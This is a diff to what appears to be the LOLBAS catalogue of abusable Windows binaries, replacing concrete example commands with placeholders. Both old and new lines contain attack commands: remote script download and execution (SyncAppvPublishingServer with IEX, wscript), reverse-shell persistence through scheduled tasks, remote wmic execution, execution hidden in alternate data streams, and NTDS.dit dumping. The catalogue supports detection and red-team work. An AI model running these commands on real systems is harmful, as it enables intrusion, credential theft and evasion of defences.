a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml 
@@ -1,11 +1,11 @@ --- Name: Runscripthelper.exe Description: Execute target PowerShell script -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test - Description: Execute the PowerShell script named test.txt + - Command: runscripthelper.exe surfacecheck \\?\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder} + Description: Execute the PowerShell script with .txt extension Usecase: Bypass constrained language mode and execute Powershell script Category: Execute Privileges: User @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index 7766c06..637a9f9 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -1,7 +1,7 @@ --- Name: Sc.exe Description: Used by Windows to manage services -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice 
@@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start + - Command: sc config {ExistingServiceName} binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start {ExistingServiceName} Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream Category: ADS @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index a938e76..d7495f2 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -1,10 +1,10 @@ --- Name: Schtasks.exe Description: Schedule periodic tasks -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe + - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr "{CMD}" Description: Create a recurring task to execute every minute. Usecase: Create a recurring task to keep reverse shell session(s) alive Category: Execute 
@@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily + - Command: schtasks /create /s targetmachine /tn "MyTask" /tr "{CMD}" /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation Category: Execute @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml @@ -34,6 +32,3 @@ Detection: - IOC: Suspicious task creation events Resources: - Link: https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/ -Acknowledgement: - - Person: - Handle: diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index bd8b118..4c8fb48 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -1,11 +1,11 @@ --- Name: Scriptrunner.exe Description: Execute binary through proxy binary to evade defensive counter measures -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Scriptrunner.exe -appvscript calc.exe - Description: Executes calc.exe + - Command: Scriptrunner.exe -appvscript {PATH:.exe} + Description: Executes executable Usecase: Execute binary through proxy binary to evade defensive counter measures Category: Execute Privileges: User 
@@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" - Description: Executes calc.cmd from remote server + - Command: ScriptRunner.exe -appvscript {PATH_SMB:.cmd} + Description: Executes cmd file from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures Category: Execute Privileges: User @@ -26,8 +26,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml - IOC: Scriptrunner.exe should not be in use unless App-v is deployed diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index 975c831..c2444ee 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -1,10 +1,10 @@ --- Name: SettingSyncHost.exe Description: Host Process for Setting Synchronization -Author: 'Elliot Killick' +Author: Elliot Killick Created: 2021-08-26 Commands: - - Command: SettingSyncHost -LoadAndRunDiagScript anything + - Command: SettingSyncHost -LoadAndRunDiagScript {PATH:.exe} Description: Execute file specified in %COMSPEC% Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: Execute 
@@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - Execute: EXE - - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything + - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab {PATH:.bat} Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. Category: Execute diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 7b12cf3..3c9fadc 100644 --- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml @@ -1,11 +1,11 @@ --- Name: ssh.exe Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices. -Author: 'Akshat Pradhan' -Created: '2021-11-08' +Author: Akshat Pradhan +Created: 2021-11-08 Commands: - - Command: ssh localhost calc.exe - Description: Execute calc.exe on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines. + - Command: ssh localhost "{CMD}" + Description: Executes specified command on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines. Usecase: Execute specified command, can be used for defense evasion. Category: Execute Privileges: User 
@@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 10 1809, Windows Server 2019 Tags: - Execute: CMD - - Command: ssh -o ProxyCommand=calc.exe . - Description: Executes calc.exe from ssh.exe + - Command: ssh -o ProxyCommand="{CMD}" . + Description: Executes specified command from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute Privileges: User diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 2ab7e48..0cbc5d9 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -1,10 +1,10 @@ --- Name: SyncAppvPublishingServer.exe Description: Used by App-v to get App-v server lists -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" + - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX" Description: Example command on how inject Powershell code into the process Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures Category: Execute @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml diff --git a/yml/OSBinaries/Tar.yml b/yml/OSBinaries/Tar.yml index 4165dfb..dc0ab5b 100644 --- a/yml/OSBinaries/Tar.yml +++ b/yml/OSBinaries/Tar.yml 
@@ -1,10 +1,10 @@ --- Name: Tar.exe Description: Used by Windows to extract and create archives. -Author: 'Brian Lucero' +Author: Brian Lucero Created: 2023-01-30 Commands: - - Command: tar -cf compressedfilename:ads C:\folder\file + - Command: tar -cf {PATH}:ads {PATH_ABSOLUTE:folder} Description: Compress one or more files to an alternate data stream (ADS). Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism Category: ADS @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Type: Compression - - Command: tar -xf compressedfilename:ads + - Command: tar -xf {PATH}:ads Description: Decompress a compressed file from an alternate data stream (ADS). Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism Category: ADS @@ -22,8 +22,8 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Type: Compression - - Command: tar -xf \\host1\archive.tar - Description: Extracts archive.tar from the remote (internal) host (host1) to the current host. + - Command: tar -xf {PATH_SMB:.tar} + Description: Extracts archive.tar from the remote (internal) host to the current host. Usecase: Copy files Category: Copy Privileges: User diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 145bd6f..62d9b87 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml 
@@ -1,11 +1,11 @@ --- Name: Ttdinject.exe Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe) -Author: 'Maxime Nadeau' +Author: Maxime Nadeau Created: 2020-05-12 Commands: - - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" - Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. + - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "{PATH:.exe}" + Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 10 2004 and above, Windows 11 Tags: - Execute: EXE - - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" - Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. + - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "{PATH:.exe}" + Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator 
@@ -25,8 +25,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index 7c51f38..e67e390 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -1,11 +1,11 @@ --- Name: Tttracer.exe Description: Used by Windows 1809 and newer to Debug Time Travel -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2019-11-05 Commands: - - Command: tttracer.exe C:\windows\system32\calc.exe - Description: Execute calc using tttracer.exe. Requires administrator privileges + - Command: tttracer.exe {PATH_ABSOLUTE:.exe} + Description: Execute specified executable from tttracer.exe. Requires administrator privileges. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10 1809 and newer, Windows 11 Tags: - Execute: EXE - - Command: TTTracer.exe -dumpFull -attach pid + - Command: TTTracer.exe -dumpFull -attach {PID} Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID Category: Dump @@ -23,8 +23,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\tttracer.exe - Path: C:\Windows\SysWOW64\tttracer.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml 
diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml index 541818d..856fbe5 100644 --- a/yml/OSBinaries/Unregmp2.yml +++ b/yml/OSBinaries/Unregmp2.yml @@ -1,7 +1,7 @@ --- Name: Unregmp2.exe Description: Microsoft Windows Media Player Setup Utility -Author: 'Wade Hickey' +Author: Wade Hickey Created: 2021-12-06 Commands: - Command: rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP" diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 4ede887..9048839 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -4,14 +4,14 @@ Description: Binary file used for compile vbs code Author: Lior Adar Created: 2020-02-27 Commands: - - Command: vbc.exe /target:exe c:\temp\vbs\run.vb + - Command: vbc.exe /target:exe {PATH_ABSOLUTE:.vb} Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb + - Command: vbc -reference:Microsoft.VisualBasic.dll {PATH_ABSOLUTE:.vb} Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile 
@@ -25,8 +25,6 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index 55724db..01fe19e 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -6,7 +6,7 @@ Created: 2018-12-04 Commands: - Command: verclsid.exe /S /C {CLSID} Description: Used to verify a COM object before it is instantiated by Windows Explorer - Usecase: Run a com object created in registry to evade defensive counter measures + Usecase: Run a COM object created in registry to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218.012 @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index 6fa837f..10a64d7 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -1,7 +1,7 @@ --- Name: Wab.exe Description: Windows address book manager -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: wab.exe 
@@ -16,8 +16,6 @@ Commands: Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml - IOC: WAB.exe should normally never be used diff --git a/yml/OSBinaries/Wbadmin.yml b/yml/OSBinaries/Wbadmin.yml index 73c5c7c..0b3b878 100644 --- a/yml/OSBinaries/Wbadmin.yml +++ b/yml/OSBinaries/Wbadmin.yml @@ -4,14 +4,14 @@ Description: Windows Backup Administration utility Author: Chris Eastwood Created: 2024-04-05 Commands: - - Command: wbadmin start backup -backupTarget:C:\temp\ -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet + - Command: wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet Description: Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx) Usecase: Snapshoting of Active Directory NTDS.dit database Category: Dump Privileges: Administrator, Backup Operators, SeBackupPrivilege MitreID: T1003.003 OperatingSystem: Windows Server - - Command: wbadmin start recovery -version: -recoverytarget:C:\temp -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet + - Command: wbadmin start recovery -version: -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet Description: Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers. Usecase: Dumping of Active Directory NTDS.dit database Category: Dump diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index f914071..6c2239b 100644 --- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml 
@@ -4,8 +4,8 @@ Description: Windows Package Manager tool Author: Paul Sanders Created: 2022-01-03 Commands: - - Command: winget.exe install --manifest manifest.yml - Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`' + - Command: winget.exe install --manifest {PATH:.yml} + Description: 'Downloads a file from the web address specified in .yml file and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`' Usecase: Download and execute an arbitrary file from the internet Category: Execute Privileges: Local Administrator - required to enable local manifest setting @@ -14,7 +14,7 @@ Commands: Tags: - Execute: Remote - Execute: EXE - - Command: winget.exe install --accept-package-agreements -s msstore [name or ID] + - Command: winget.exe install --accept-package-agreements -s msstore {name or ID} Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked Category: Download diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 913ce05..735fa5e 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml 
@@ -4,8 +4,8 @@ Description: Windows Logon Reminder executable Author: Moshe Kaplan Created: 2022-02-16 Commands: - - Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u calc.exe" - Description: Execute calc.exe with wlrmdr.exe as parent process + - Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u {PATH:.exe}" + Description: Execute executable with wlrmdr.exe as parent process Usecase: Use wlrmdr as a proxy binary to evade defensive countermeasures Category: Execute Privileges: User @@ -15,8 +15,6 @@ Commands: - Execute: EXE Full_Path: - Path: c:\windows\system32\wlrmdr.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml - IOC: wlrmdr.exe spawning any new processes diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 5cb953c..2438396 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -1,10 +1,10 @@ --- Name: Wmic.exe Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" + - Command: wmic.exe process call create "{PATH_ABSOLUTE}:program.exe" Description: Execute a .EXE file stored as an Alternate Data Stream (ADS) Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures Category: ADS @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: wmic.exe process call create calc + - Command: wmic.exe process call create "{CMD}" Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures Category: Execute 
@@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" + - Command: wmic.exe /node:"192.168.0.1" process call create "{CMD}" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system Category: Execute @@ -32,7 +32,7 @@ Commands: Tags: - Execute: CMD - Execute: Remote - - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" + - Command: wmic.exe process get brief /format:"{REMOTEURL:.xsl}" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system Category: Execute @@ -42,7 +42,7 @@ Commands: Tags: - Execute: XSL - Execute: Remote - - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" + - Command: wmic.exe process get brief /format:"{PATH_SMB:.xsl}" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system Category: Execute diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index d2dd19a..f1930ea 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -1,7 +1,7 @@ --- Name: WorkFolders.exe Description: Work Folders -Author: 'Elliot Killick' +Author: Elliot Killick Created: 2021-08-16 Commands: - Command: WorkFolders diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index 53b5ed3..9c5c36b 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml 
@@ -1,10 +1,10 @@ --- Name: Wscript.exe Description: Used by Windows to execute scripts -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: wscript //e:vbscript c:\ads\file.txt:script.vbs + - Command: wscript //e:vbscript {PATH}:script.vbs Description: Execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures Category: ADS @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH - - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js + - Command: echo GetObject("script:{REMOTEURL:.js}") > {PATH_ABSOLUTE}:hi.js && wscript.exe {PATH_ABSOLUTE}:hi.js Description: Download and execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures Category: ADS diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index 2382a71..0c27e7b 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -1,7 +1,7 @@ --- Name: Wsreset.exe Description: Used to reset Windows Store settings according to its manifest file -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2019-03-18 Commands: - Command: wsreset.exe @@ -13,8 +13,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\wsreset.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml diff --git a/yml/OSBinaries/Wuauclt.yml b/yml/OSBinaries/Wuauclt.yml index 42a1e23..b1b1206 100644 --- a/yml/OSBinaries/Wuauclt.yml 
+++ b/yml/OSBinaries/Wuauclt.yml @@ -1,11 +1,11 @@ --- Name: wuauclt.exe Description: Windows Update Client -Author: 'David Middlehurst' +Author: David Middlehurst Created: 2020-09-23 Commands: - - Command: wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer - Description: Full_Path_To_DLL would be the absolute path to .DLL file and would execute code on attach. + - Command: wuauclt.exe /UpdateDeploymentProvider {PATH_ABSOLUTE:.dll} /RunHandlerComServer + Description: Loads and executes DLL code on attach. Usecase: Execute dll via attach/detach methods Category: Execute Privileges: User diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index f7fbc3c..c3b5c95 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -1,7 +1,7 @@ --- Name: Xwizard.exe Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: COM - - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM + - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL} Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet Category: Download 
